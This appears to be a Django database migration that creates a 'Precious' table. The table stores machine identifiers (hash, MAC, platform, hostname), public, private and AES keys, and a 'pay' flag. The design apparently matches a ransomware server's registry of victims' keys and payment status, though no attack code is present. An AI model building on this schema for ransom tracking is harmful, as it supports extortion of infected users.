# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-27 11:11
from __future__ import unicode_literals

from django.db import migrations, models
import django.utils.timezone


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Precious',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False)),
                ('hash', models.CharField(max_length=64, verbose_name='Hash')),
                ('mac', models.CharField(max_length=12, verbose_name='MAC')),
                ('platform', models.CharField(max_length=64, verbose_name='Platform')),
                ('hostname', models.CharField(max_length=128, verbose_name='Hostname')),
                ('public_key', models.TextField(max_length=512, verbose_name='Public Key')),
                ('private_key', models.TextField(max_length=1024, verbose_name='Private Key')),
                ('aes_key', models.TextField(max_length=16, verbose_name='Aes Key')),
                ('pay', models.BooleanField(default=False, verbose_name='Pay State')),
                ('timestamp', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Exactly Time')),
            ],
            options={
                'verbose_name_plural': 'Precious',
                'db_table': 'Precious',
                'managed': True,
            },
        ),
    ]
